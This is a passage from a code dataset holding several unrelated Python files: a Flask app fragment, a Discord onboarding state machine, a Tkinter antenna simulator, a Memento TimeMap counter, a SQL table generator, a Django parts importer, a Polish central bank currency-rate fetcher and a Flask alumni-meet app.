    \"\n out = subprocess.Popen(['python', 'punisher.py', 'start'], \n stdout=subprocess.PIPE, \n stderr=subprocess.STDOUT)\n\n #stdout,stderr = out.communicate()\n #print(stdout)\n #print(stderr)\n return render_template('dashboard.html', heading=\"statewise\", data=session.get('data'), state=dict_statewise['TT'], select=formatteddropdown ,innerHTMLS=dict_innerHTML[\"TT\"])\n #return formattedhtml_snippet\n\n\n\nif __name__ == '__main__':\n application.run()\n","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"240840281","text":"#anyway, state table is a dict, where each item is a state, with id, function to run when entering state , with array of parameters - useful, for example, for \"add role\" function. most important is a list of state transitions, each one includes a type (like on_message) which is an actual function, a function that returns a number, an array of parameters to give that function (or teh parent \"type\" function) and an array of states you go to according to these values. \n#we also have ticks every hour, so we can set things to do when tick count is mod that number. tick count is per yak!\n\n#for each type, we have an array for each state table. the array includes the states which care about that type. when running and the event occurs, if it is an on_tick event (not triggered by a user, i can imagine there are others) we see which states care about the event. then, for each state, we extract all the yaks in that state AND which do not say \"exclude me\". then, we call teh function, FOR THAT USER, with teh parameters and go to where result sends up.\n#if it is an event triggered by a user (like a message), we can simply check in db that he is not 'frozen\" and run the function in the state table, accorindg to his state (taken form db), if relevant\n\nfrom discord_shepherd import *\n\n\n\n#here be functions used in the above state table. note they are called by predefined functions, like \"on_message\"\n#all are async because some are async and no way of knowing which is which. but they can probbaly all run in parallel, any order\nasync def null_func(x,y,z): #always two parameters and then array. that is my format\n return 0\n \nasync def reminder(yak,y,x):\n await send_dm(yak,y,[\"reminder: \"+x[0]]) # 3rd parameter is always an array\n return 0\n\nasync def has_role(yak,y,x):\n #print(\"has role:\",yak,x)\n if x[0] in yak['roles']:\n return 1\n return 0\n\nasync def kick_out(yak,y,x):\n print(\"kick out id with message (sent by dm):\",yak['discordid'],x[0])\n return 0\n\nasync def send_dm(yak,y,x):\n print(\"here i send a DM to the current yak we are looking at, with text:\",yak['discordid'],x[0])\n print(\"client:\", client, client.get_user, client.get_user(yak['discordid']))\n target=client.get_user(yak['discordid']).dm_channel\n if (not target): \n print(\"need to create dm channel\",flush=True)\n target=await client.get_user(yak['discordid']).create_dm()\n print(\"target is:\",target,flush=True) \n #await target.send(x[0])# do not want to actually send yet\n return 0\n\nasync def posted_introduction(yak,m,x):\n print('check if this message is in introduction channel. if yes, return 1, otherwise 0')\n if m.channel.id==INTRODUCTIONCHANNELID:\n return 1\n return 0\n\n\nnewyak={\n'starthere': {\n 'id':17, \n 'onenter': null_func, \n 'onenter_params': [],\n 'transitions':[\n {\"on_tick\":{\n \"run\": has_role,\n 'run_params':[1, 'yak'], \n 'goto': ['justjoined','yak'] \n }},\n ]\n },\n'justjoined': {\n 'id':0, #is this needed?\n 'onenter': send_dm, #NOT run on staying within same state due toa failed transition\n 'onenter_params': ['welcome to the yak collective.\\n\\nPlease post an introduction within 7 days.\\n\\nStart here (we use roam for data display): (some link to roam)'],#also send 0 as teh 2nd parameter\n 'transitions':[\n {\"on_message\":{#notclear if we really look for other events...\n \"run\": posted_introduction,\n 'run_params':[], #we always send theyak and teh message, followed by the list\n 'goto': ['','yak'] #if 0 stay in state (not the same as going again to justjoin, as we do not zero anything, otherwise go up a level\n }},\n {\"on_tick\":{ #called every tick. the first param is checked before we actually run the function (special for on_tick function)\n #for on_tick we always send theyak and the tick number before the param\n \"run\": reminder,\n 'run_params':[48,\"please post an introduction in the introduction channel\"],#every 48 ticks post this message. lets assume ticks are in hours\n 'goto':['']\n }},\n {\"on_tick\":{ #called every tick\n \"run\": null_func,\n 'run_params':[7*24],\n 'goto':['out']\n }}\n ]\n },\n'yak': {\n 'id':1,\n 'onenter': send_dm, \n 'onenter_params': ['thank you for posting an introduction. here are some more links to consider\\n'],\n 'transitions': [\n {\"on_tick\": { #called every tick\n \"run\": null_func,\n 'run_params':[48],#every 48 ticks post this message. lets assume ticks are in hours\n 'goto':['regular']\n }\n }]\n },\n# we could have more link suggestion states; 'stage1links':\n\n'regular':{ #not much happening here, but we could track what is going on\n 'id':2,\n 'onenter': send_dm, \n 'onenter_params': ['if you ever need help, pls send me a dm \"$help\"'],\n 'transitions':[]\n },\n'out':{ #not much happening here, but we coudl track what is going on\n 'id':3,\n 'onenter': kick_out, \n 'onenter_params': ['you did not post an introduction withon the required timelimit. try again later'],\n 'transitions':[]\n }\n}\n\nmachines=[\n {\n 'states':newyak,\n 'name':\"newyak\",\n 'startat':\"starthere\", \n 'lut':{ #will add more when new functions are created\n \"on_tick\":[],\n \"on_message\":[]\n }\n }\n] \n","sub_path":"statemachine.py","file_name":"statemachine.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"292637222","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAntenna Visualizer\nCreated on Thu Feb 27 18:05:13 2020\n\nDescription: A GUI based antenna simulator. Tweak sliders to adjust antenna parameters such as length, array patterns, and excitation phasing.\n\nAuthors:\n Jordan Baxter\n Chelsea Starr\n\"\"\"\n\nimport tkinter as tk\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\n# Implement the default Matplotlib key bindings.\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nimport plots\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n master.title(\"GUI Based Antenna Simulation\")\n self.pack()\n self.create_frames()\n self.create_widgets()\n\n\n def create_frames(self):\n self.p_frame = tk.Frame(self.master)\n self.p_frame.pack(side = 'left')\n self.w_frame = tk.Frame(self.master)\n self.w_frame.pack(side = 'right')\n self.plots = plots.Plots(figsize=(11,9), dpi=75)\n self.canvas = FigureCanvasTkAgg(self.plots, master=self.p_frame)\n self.canvas.draw()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n\n def create_widgets(self):\n\n ### DROPDOWN OPTIONS MENU ###\n self.simType = tk.StringVar()\n self.simType.set(\"Single Dipole\")\n\n self.simTypeMenu = tk.OptionMenu(self.w_frame,\n self.simType,\n \"Single Dipole\",\n \"Antenna Array\",\n command=self.updateControls)\n self.simTypeMenu.grid(row=0,\n column=1,\n columnspan=2)\n tk.Label(self.w_frame, text=\"Simulation Type\").grid(row=0, column=0)\n ### DROPDOWN OPTIONS MENU ###\n\n ### DELTA PHI SLIDER ###\n self.dp_sc = tk.Scale(self.w_frame,\n from_=-180,\n to=180,\n resolution=5,\n length=300,\n orient='horizontal',\n tickinterval=20,\n command=self.upDPhi,\n label=\"Excitation Phasing [deg]\")\n ### /DELTA PHI SLIDER ###\n\n\n ### D SLIDER ###\n self.d_sc = tk.Scale(self.w_frame,\n from_=0,\n to=2,\n resolution=0.01,\n length=300,\n orient='horizontal',\n tickinterval=0.25,\n command=self.upD,\n label=\"Distance Between Elements [d / \\u03bb]\")\n ### /D SLIDER ###\n\n ### L SLIDER ###\n self.l_sc = tk.Scale(self.w_frame,\n from_=0,\n to=1.75,\n resolution=0.01,\n length=300,\n orient='horizontal',\n tickinterval=0.25,\n command=self.upL,\n label=\"Length of Dipole [l / \\u03bb]\")\n self.l_sc.grid(row=2,\n columnspan=3)\n ### /L SLIDER ###\n\n ### NUMBER OF ELEMENTS SLIDER ###\n self.ne_sc = tk.Scale(self.w_frame,\n from_=2,\n to=20,\n resolution=1,\n length=300,\n orient='horizontal',\n tickinterval=2,\n command=self.upNumEle,\n label=\"Number of Elements\")\n ### /NUMBER OF ELEMENTS SLIDER ###\n\n ### INSERT DIPOLE CHECKBOX ###\n self.insDipVar = tk.IntVar()\n self.insDipVar.set(1)\n\n self.noDip = tk.Radiobutton(self.w_frame,text=\"No Dipole\", variable=self.insDipVar, value=1, command=self.insDip)\n self.coLin = tk.Radiobutton(self.w_frame, text=\"Colinear Array\", variable=self.insDipVar, value=2, command=self.insDip)\n self.perp = tk.Radiobutton(self.w_frame, text=\"Perpendicular Array\", variable=self.insDipVar, value=3, command=self.insDip)\n ### /INSERT DIPOLE CHECKBOX ###\n\n ### Toggle 3D Button ###\n self.button3D = tk.Button(self.w_frame,\n text=\"Show 3D Plot\", fg=\"green\",\n command=self.up3D)\n self.button3D.grid(row=1,\n column=1,\n columnspan=2)\n\n ### QUIT BUTTON ###\n self.quit = tk.Button(self.master, text=\"QUIT\", fg=\"red\",\n command=self.master.destroy)\n self.quit.pack(side=\"bottom\")\n\n def upNumEle(self, slidevalue):\n self.plots.setNumEle(slidevalue)\n self.canvas.draw()\n\n def upDPhi(self, slidevalue):\n self.plots.setDPhi(slidevalue)\n self.canvas.draw()\n\n def upD(self, slidevalue):\n if (float(slidevalue) == 0):\n newVal = 0.0001\n else:\n newVal = slidevalue\n self.plots.setD(newVal)\n self.canvas.draw()\n\n def upL(self, slidevalue):\n if (float(slidevalue) == 0):\n newVal = 0.0001\n else:\n newVal = slidevalue\n self.plots.setL(newVal)\n self.canvas.draw()\n\n def up3D(self):\n if (self.plots.toggle3D() == True):\n self.toggleWidgets(\"off\")\n else:\n self.toggleWidgets(\"on\")\n self.canvas.draw()\n\n def insDip(self):\n arrType = self.insDipVar.get()\n if(arrType == 1):\n self.l_sc.grid_forget()\n self.plots.setArrType(\"NoDip\")\n elif(arrType == 2):\n self.l_sc.grid(row=6,\n columnspan=3)\n self.plots.setArrType(\"ColArray\")\n elif(arrType == 3):\n self.l_sc.grid(row=6,\n columnspan=3)\n self.plots.setArrType(\"PerpArray\")\n self.canvas.draw()\n\n def updateControls(self, value):\n simType = self.simType.get()\n if(simType == \"Single Dipole\"):\n self.dp_sc.grid_forget()\n self.d_sc.grid_forget()\n self.ne_sc.grid_forget()\n self.noDip.grid_forget()\n self.coLin.grid_forget()\n self.perp.grid_forget()\n self.insDipVar.set(1)\n self.l_sc.grid(row=2,\n columnspan=3)\n elif(simType == \"Antenna Array\"):\n self.l_sc.grid_forget()\n self.d_sc.grid(row=2,\n columnspan=3)\n self.dp_sc.grid(row=3,\n columnspan=3)\n self.ne_sc.grid(row=4,\n columnspan=3)\n self.noDip.grid(row=5,\n column=0)\n self.coLin.grid(row=5,\n column=1)\n self.perp.grid(row=5,\n column=2)\n self.plots.setSimType(simType)\n self.canvas.draw()\n\n\n def toggleWidgets(self,onOff='on'):\n if(onOff == \"off\"):\n self.dp_sc.configure(state='disabled')\n self.d_sc.configure(state='disabled')\n self.noDip.configure(state='disabled')\n self.coLin.configure(state='disabled')\n self.perp.configure(state='disabled')\n self.l_sc.configure(state='disabled')\n self.simTypeMenu.configure(state='disabled')\n else:\n self.dp_sc.configure(state='normal')\n self.d_sc.configure(state='normal')\n self.noDip.configure(state='normal')\n self.coLin.configure(state='normal')\n self.perp.configure(state='normal')\n self.l_sc.configure(state='normal')\n self.simTypeMenu.configure(state='normal')\n\n\n\n\n### Constuct Figures ###\n\n\nroot = tk.Tk()\napp = Application(master=root)\napp.mainloop()\n","sub_path":"MacOSAntennaSimulator/MacOSAntennaSimulator.app/Contents/Resources/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"61548971","text":"import re\nimport urllib2\nimport json\nimport sys\n\ndef getmementos(url):\n\tmem_prefix = 'http://mementoproxy.cs.odu.edu/aggr/timemap/link/1/' + url #memento aggregator is concatenated with the url for which mementos should be found out\n\ttry: \n\t\tresponse = urllib2.urlopen(mem_prefix)\n\t\ttime_map = response.read()\n\texcept urllib2.HTTPError:\n\t\ttime_map = None\n\treturn time_map\n\nfind_memento = re.compile(r'rel.*?=.*?\"memento\".*?') # To find memento using regular expression\nmy_urls = open('my_json_data','r+') #This file contains 1000 urls their tweets,tweet ids and created dates\noutput_file = open('mem_and_links.json','a') # This file stores number of mementos for each url\noutput_file2 = open('only_count.csv','a')\noutput_file_carbon = open('mem_grt0.json','a') \none_element={}\ncount_of_mems = [] #array is created to store count \nfor line in my_urls.readlines(): #reads line by line\n\teach_line = json.loads(line) \n\turl = each_line['url']\n\tmemento_data = getmementos(url)\n\n\t#print memento_data\n\tif memento_data == 'Null':\n\t\tcount = 0\n\t\tone_element['num_of_mems'] = count\n\t\tone_element['url'] = url\n\t\toutput_file.write(json.dumps(one_element)+'\\n') #adding each element into json file\n\t\t#print count,\" \",url\n\telse:\n\t\tcount = len(find_memento.findall(str(memento_data))) #forms an array where \"memento\"\" is found and finds the length of that array\n\t\t# a=find_memento.findall(str(memento_data))\n\t\t# print a\n\t\tone_element['num_of_mems'] = count\n\t\tone_element['url'] = url\n\t\toutput_file.write(json.dumps(one_element)+'\\n') #adding each element into json file\n\t\toutput_file2.write(\"%s\\n\" % (count))\n\t\tif one_element['num_of_mems'] != 0:\n\t\t\toutput_file_carbon.write(json.dumps(one_element)+'\\n') # for getting urls and mementos for mementos > 0\n\t\t#output_file2.write('\\r\\n')\n\t\t#print count,\" \",url\noutput_file.close()\t\t\noutput_file2.close()\t\noutput_file_carbon.close()\t\n\n\n","sub_path":"Using Python Extracting 1000 unique URI's from twitter and downloading TimeMaps for each target URI using Memento Aggregator/documentation/get_memento_count.py","file_name":"get_memento_count.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"401412491","text":"from thryft.generator.struct_type import StructType\nfrom thryft.generators.sql._sql_compound_type import _SqlCompoundType\nfrom thryft.generators.sql.sql_field import SqlField\nfrom yutil import decamelize, lpad\n\n\nclass SqlStructType(StructType, _SqlCompoundType):\n def sql_create_table(self):\n column_definitions = []\n foreign_key_definitions = []\n for annotation_i, annotation in enumerate(self.annotations):\n if annotation.name == 'sql_column':\n column_definitions.append(annotation.value)\n elif annotation.name == 'sql_foreign_key':\n if annotation_i == 0:\n raise ValueError('sql_foreign_key annotation on a struct must follow a sql_column annotation')\n elif self.annotations[annotation_i - 1].name != 'sql_column':\n raise ValueError(\"sql_foreign_key annotation on a struct must follow a sql_column annotation, not \" + self.annotations[annotation_i - 1].name)\n foreign_key_definitions.append(SqlField.sql_foreign_key_definition_static(\n column_name=self.annotations[annotation_i - 1].value.split(' ', 1)[0],\n foreign_table_name=annotation.value[0],\n foreign_column_name=annotation.value[1]\n ))\n for field in self.fields:\n column_definition = field.sql_column_definition()\n if column_definition is not None:\n column_definitions.append(column_definition)\n for field in self.fields:\n foreign_key_definition = field.sql_foreign_key_definition()\n if foreign_key_definition is not None:\n foreign_key_definitions.append(foreign_key_definition)\n column_definitions.extend(foreign_key_definitions)\n column_definitions = lpad(\",\\n \", \",\\n \".join(column_definitions))\n name = decamelize(self.name)\n return \"\"\"\\\nCREATE TABLE IF NOT EXISTS %(name)s(\n id INTEGER PRIMARY KEY AUTO_INCREMENT NOT NULL%(column_definitions)s\n)\"\"\" % locals()\n\n def sql_name(self):\n return None\n","sub_path":"compiler/src/thryft/generators/sql/sql_struct_type.py","file_name":"sql_struct_type.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"527810881","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2013, First Party Software\n# All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without modification, \n# are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice, \n# this list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice, \n# this list of conditions and the following disclaimer in the documentation \n# and/or other materials provided with the distribution.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE \n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR \n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT \n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) \n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, \n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) \n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF \n# SUCH DAMAGE.\n\nimport re\nimport os\nimport logging\n\nfrom decimal import Decimal, InvalidOperation, ROUND_CEILING\n\nfrom django.db import DatabaseError\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom servo.models import Product, TaggedItem\n\n\nclass Command(BaseCommand):\n\n help = \"Imports complete GSX parts database\"\n\n def handle(self, *args, **options):\n\n update_prices = True\n import_vintage = True\n dbpath = \"servo/uploads/products/partsdb.csv\"\n\n try:\n partsdb = open(dbpath, \"r\")\n except Exception:\n pass\n\n content_type = ContentType.objects.get(model=\"product\")\n\n for l in partsdb.readlines():\n\n line = l.decode(\"iso-8859-1\")\n row = line.strip().split(\"\\t\")\n\n if row[5] == \"\" or row[5] == \"Currency\":\n continue # Skip header row and rows without currency\n\n logging.debug(row)\n\n category = row[0]\n\n if re.match(r'~VIN', category) and not import_vintage:\n continue # Skip vintage devices if so desired\n\n p_number = row[1]\n\n if re.match(r'675-', p_number):\n continue # Skip DEPOT REPAIR INVOICE\n\n p_title = row[2]\n p_type = row[3]\n lab_tier = row[4]\n\n try:\n stock_price = Decimal(row[6])\n except InvalidOperation:\n continue # Skip parts with no stock price\n\n exchange_price = Decimal(row[7])\n\n eee_code = row[8]\n\n # skip substitute\n component_group = row[10] or None\n is_serialized = row[11]\n req_diag = (row[12] == \"Y\")\n\n product, created = Product.objects.get_or_create(code=p_number)\n\n product.title = p_title\n product.eee_code = eee_code\n product.labour_tier = lab_tier\n product.part_type = p_type or \"OTHER\"\n\n product.component_code = component_group\n product.is_serialized = (is_serialized == \"Y\")\n\n if update_prices:\n if stock_price:\n purchase_sp = Decimal(stock_price)\n product.price_purchase_stock = purchase_sp.to_integral_exact(rounding=ROUND_CEILING)\n product.set_stock_sales_price()\n\n if exchange_price:\n purchase_ep = Decimal(exchange_price)\n product.price_purchase_exchange = purchase_ep.to_integral_exact(rounding=ROUND_CEILING)\n product.set_exchange_sales_price()\n\n product.save()\n\n try:\n tag, created = TaggedItem.objects.get_or_create(\n content_type=content_type,\n object_id=product.pk,\n tag=category)\n tag.save()\n except DatabaseError:\n pass\n\n os.unlink(dbpath)\n","sub_path":"servo/management/commands/importparts.py","file_name":"importparts.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"271075846","text":"from app.db import get_db\nimport requests\nimport time\nimport sys\nfrom datetime import timedelta\n\n# deklaracje stałych\nGET_CURRENCIES_QUERY = 'SELECT name, code FROM currencies;'\nCURRENCY_UPDATE_URL = 'http://api.nbp.pl/api/exchangerates/tables/A?format=json'\nEXCHANGE_API_QUERY = \"http://api.nbp.pl/api/exchangerates/rates/A/{code}/{startDate}/{endDate}/?format=json\"\n\nMAX_DAYS_API = 92\nDEFAULT_TIMEOUT = 1\n\n\ndef get_json_response(url):\n \"\"\"\n Zwraca strukturę json otrzymana z requestu, przy okazji obsługując błędy\n transmisji i timeout'u.\n :param url: url requestu\n :return: json\n \"\"\"\n try:\n return requests.get(url, timeout=DEFAULT_TIMEOUT).json()\n except requests.Timeout:\n print(' * [dbg] Timeout error while requesting from API', file=sys.stderr)\n return None\n except ValueError:\n print(' * [dbg] Error while parsing JSON response', file=sys.stderr)\n return None\n except requests.exceptions.ConnectionError:\n print(' * [dbg] Connection error', file=sys.stderr)\n return None\n\n\ndef fetch_currency_list(db, c):\n \"\"\"\n Korzystając z API NBP pobiera listę walut i zapisuje ja w bazie danych do\n pozniejszego uzytku\n :param db: handler bazy danych\n :param c: handler kursora\n :return: lista dostępnych walut\n \"\"\"\n return_data = []\n start_time = time.time()\n\n r = get_json_response(CURRENCY_UPDATE_URL)\n\n try:\n currency_list = r[0]['rates']\n for item in currency_list:\n c.execute('''INSERT OR IGNORE INTO currencies (name, code)\n VALUES ('{currency}', '{code}');'''.format(\n currency=item['currency'],\n code=item['code'])\n )\n return_data.append((item['currency'], item['code']))\n except KeyError:\n print(' * [dbg] Error while parsing API request', file=sys.stderr)\n return None\n\n # trzeba manualnie dodać PLN\n c.execute('''INSERT OR IGNORE INTO currencies (name, code)\n VALUES ('{currency}', '{code}');'''.format(\n currency='polski złoty',\n code='PLN')\n )\n return_data.append(('polski złoty', 'PLN'))\n\n db.commit()\n end_time = time.time()\n print(' * [log] Finished getting currency list in {}'.format(end_time - start_time), file=sys.stderr)\n\n return return_data\n\n\ndef get_currency_list():\n \"\"\"\n Zwraca dostępną listę walut z bazy danych. Jeżeli liczba pobranych z bazy\n walut jest mniejsza niz 2, fetchuje je z API i zapisuje do bazy, a następnie\n zwraca\n :return: lista walut\n \"\"\"\n db = get_db()\n c = db.cursor()\n\n currencies = c.execute(GET_CURRENCIES_QUERY).fetchall()\n\n if len(currencies) < 2:\n currencies = fetch_currency_list(db, c)\n\n return currencies\n\n\ndef get_single_exchange_rate(start_date, end_date,\n currency_code):\n \"\"\"\n Zwraca listę kursów danej waluty z zadanego okresu czasu. Jeżeli baza danych nie zawiera\n pełnej liczby wymaganych rekordów, uruchomiona zostaje funkcja która pobiera je z API.\n :param start_date: data początkowa\n :param end_date: data końcowa\n :param currency_code: kod waluty\n :return: lista kursów danej waluty\n \"\"\"\n days_delta = (end_date - start_date).days\n db = get_db()\n c = db.cursor()\n\n query = '''SELECT date, value from exchange_rates WHERE code = '{code}'\n AND date BETWEEN '{start_date}' AND '{end_date}' ORDER BY date ASC;'''.format(\n code=currency_code,\n start_date=start_date,\n end_date=(end_date - timedelta(1))\n )\n\n rates = c.execute(query).fetchall()\n\n if len(rates) != days_delta:\n rates = fetch_single_exchange_rate(db, c, start_date, end_date, currency_code)\n\n return rates\n\n\ndef fetch_single_exchange_rate(db, c,\n start_date, end_date,\n currency_code):\n \"\"\"\n Pobiera listę kursów zadanej waluty z określonego przedziału czasu. API NBP nie posiada\n rekordów dla każdego dnia w roku, więc puste rekordy są NULLowane, tak by łatwiej określić,\n czy w bazie danych jest wymagana liczba kursów.\n :param db: handler bazy danych\n :param c: handler kursora\n :param start_date: data poczatkowa\n :param end_date: data koncowa\n :param currency_code: kod waluty\n :return: lista kursow danej waluty\n \"\"\"\n return_data = []\n days_delta = (end_date - start_date).days\n dates = [(start_date + timedelta(i)).strftime('%Y-%m-%d') for i in range(days_delta)]\n start_time = time.time()\n\n query = EXCHANGE_API_QUERY.format(code=currency_code,\n startDate=start_date,\n endDate=end_date)\n\n try:\n r = get_json_response(query)\n except requests.Timeout:\n print(' * [dbg] Error while requesting from API', file=sys.stderr)\n return None\n\n try:\n rates = r['rates']\n except KeyError:\n print(' * [dbg] Error while parsing API request', file=sys.stderr)\n return None\n except TypeError:\n print(' * [dbg] Error while parsing API request', file=sys.stderr)\n return None\n\n for rate in rates:\n if rate['effectiveDate'] in dates:\n c.execute('''INSERT OR REPLACE INTO exchange_rates (date, value, code)\n VALUES ('{date}', {value}, '{code}');'''.format(\n date=rate['effectiveDate'],\n value=rate['mid'],\n code=r['code'])\n )\n return_data.append((rate['effectiveDate'], rate['mid']))\n dates.pop(dates.index(rate['effectiveDate']))\n\n for empty_date in dates:\n c.execute('''INSERT OR REPLACE INTO exchange_rates (date, empty, code)\n VALUES ('{date}', {empty}, '{code}');'''.format(\n date=empty_date,\n empty=1,\n code=r['code'])\n )\n return_data.append((empty_date, None))\n\n db.commit()\n end_time = time.time()\n print(' * [log] Finished getting query {} -> {} @ {} in {}'.format(\n start_date,\n end_date,\n currency_code,\n end_time - start_time\n ), file=sys.stderr)\n\n return return_data\n\n\ndef get_exchange_rates(start_date,\n end_date,\n currency_code):\n \"\"\"\n Pobiera listę kursów danej waluty na przestrzeni czasu. Dokładniej funkcja ta służy do\n rozbicia requestów na części, tak by ominąć limit requestów dla API NBP wynoszący maksymalnie\n 92 dni. Dane są pobierane z bazy danych lub requestowane z API, w zależności od ich dostępności.\n :param start_date: data startowa\n :param end_date: data koncowa\n :param currency_code: kod waluty\n :return: lista kursów danej waluty\n \"\"\"\n return_data = []\n\n full_delta = (end_date - start_date).days\n how_many_runs = full_delta / MAX_DAYS_API\n\n # jezeli z dzielenia wyjdzie float < 0, to wykonujemy\n # przynajmniej jeden request\n if int(how_many_runs) < how_many_runs:\n how_many_runs = int(how_many_runs) + 1\n\n # zamiana na liczbe calkowita do uzycia w petli\n how_many_runs = int(how_many_runs)\n end = start_date\n\n for run in range(how_many_runs):\n start = end\n end = start + timedelta(days=MAX_DAYS_API)\n if end > end_date:\n end = end_date\n\n print(' * [log] Getting {} from {} -> {}'.format(currency_code, start, end), file=sys.stderr)\n\n result = get_single_exchange_rate(start, end, currency_code)\n if result is None:\n print(' * [dbg] Error while getting data from system', file=sys.stderr)\n return None\n else:\n return_data.extend(result)\n\n try:\n return_data.sort(key=lambda tup: tup[0]) # sortowanie przed zwróceniem\n except TypeError:\n print('[dbg] Error while sorting', file=sys.stderr)\n\n return return_data\n\n\ndef calculate_exchange_rates(base_rates, other_rates):\n \"\"\"\n Funkcja dokonuje obliczeń kursów walut innych niż PLN.\n W związku z tym, że API NBP zwraca tylko kursy PLN -> X,\n wymagane jest przeliczenie wtedy, kiedy użytkownik zażąda\n innej pary walut\n :param base_rates: bazowa waluta\n :param other_rates: docelowa waluta\n :return: obliczony kurs waluty docelowej\n \"\"\"\n result = []\n\n if len(base_rates) != len(other_rates):\n print(' * [dbg] Error while converting, data differ in length', file=sys.stderr)\n return None\n\n for r1, r2 in zip(base_rates, other_rates):\n\n try:\n if r1[1] is None or r2[1] is None:\n result.append((r1[0], None))\n continue\n\n result.append((r1[0], r1[1]/r2[1]))\n except IndexError:\n continue\n\n result.sort(key=lambda tup: tup[0])\n return result\n","sub_path":"app/api_nbp.py","file_name":"api_nbp.py","file_ext":"py","file_size_in_byte":8901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98354291","text":"from flask import (Flask, request, flash, url_for, redirect, render_template)\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail, Message\nfrom itsdangerous import URLSafeTimedSerializer, SignatureExpired\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///alumnUS.sqlite'\napp.config['SECRET_KEY'] = \"random string\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config.from_pyfile('config.cfg')\n\nmail = Mail(app)\n\ns = URLSafeTimedSerializer('Thisisasecret!')\n\n\ndb = SQLAlchemy(app)\n\nclass alumni_meets(db.Model):\n mid = db.Column('mid', db.Integer, primary_key = True)\n date = db.Column(db.String(100))\n time = db.Column(db.String(50))\n no_of_alumni = db.Column(db.String(200)) \n\n\n def __init__(self, date, time, no_of_alumni, ):\t\n\t self.date = date\n\t self.time = time\n\t self.no_of_alumni = no_of_alumni\n\t \n\n@app.route('/')\ndef home1():\n return render_template('home1.html')\n\n@app.route('/meet', methods = ['GET', 'POST'])\ndef meet():\n if request.method == 'POST':\n if not request.form['date'] or not request.form['time'] or not request.form['no_of_alumni']:\n flash('Please enter all the fields', 'error')\n else:\n alumni_meet = alumni_meets(request.form['date'], request.form['time'],request.form['no_of_alumni'])\n \n db.session.add(alumni_meet)\n db.session.commit()\n flash('Record was successfully added')\n return render_template('sendreq.html')\n return render_template('meet.html')\n \n \n@app.route('/sendreq', methods=['GET', 'POST'])\ndef sendreq():\n if request.method == 'GET':\n return '
    '\n i=0\n with mail.connect() as conn:\n email = request.form['email']\n users = email.split(\",\")\n while i < len(users):\n msg = Message('SUBJECT', sender=' authorized email', recipients=[users[i]])\n\n msg.body = 'CONTENT '\n\n conn.send(msg)\n i=i+1\n return '

    The email you entered is {}.

    '.format(email)\n\nclass alumni_personal_details(db.Model):\n aid = db.Column('aid', db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n dob = db.Column(db.String(50))\n address = db.Column(db.String(200)) \n from_y = db.Column(db.String(100))\n to_y = db.Column(db.String(50))\n contact = db.Column(db.String(200)) \n mail_id = db.Column(db.String(100))\n \n\n\n def __init__(self, name, dob, address, from_y, to_y, contact, mail_id):\t\n\t self.name = name\n\t self.dob = dob\n\t self.address = address\n\t self.from_y = from_y\n\t self.to_y = to_y\n\t self.contact = contact\n\t self.mail_id =mail_id\n\n@app.route('/alumni_per', methods = ['GET', 'POST'])\ndef alumni_per():\n if request.method == 'POST':\n if not request.form['name'] or not request.form['dob'] or not request.form['address'] or not request.form['from_y'] or not request.form['to_y'] or not request.form['contact'] or not request.form['mail_id']:\n flash('Please enter all the fields', 'error')\n else:\n alumni_personal = alumni_personal_details(request.form['name'], request.form['dob'],request.form['address'],request.form['from_y'],request.form['to_y'],request.form['contact'],request.form['mail_id'])\n \n db.session.add(alumni_personal)\n db.session.commit()\n flash('Record was successfully added')\n return render_template('home.html')\n return render_template('alumni_per.html')\n\t\n\nclass alumni_professional_details(db.Model):\n aid = db.Column('aid', db.Integer, primary_key = 